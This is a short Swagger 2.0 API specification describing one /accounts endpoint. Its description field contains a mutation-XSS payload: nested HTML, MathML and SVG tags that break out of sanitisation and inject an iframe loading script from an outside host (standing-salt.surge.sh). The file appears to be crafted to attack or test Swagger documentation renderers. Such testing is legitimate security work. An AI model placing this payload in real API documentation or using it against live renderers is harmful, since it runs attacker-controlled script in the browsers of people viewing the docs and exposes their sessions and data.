swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><desc id="</textarea><math><mtext><!--"><textarea id="--><iframe srcdoc="<script><script src=https://standing-salt.surge.sh/script.js></script>">
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      parameters:
          - description: testing hello world
      responses:
        '200':
          description: No response was specified <b>testing bold tag</b> <i>testing italics</i> 
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
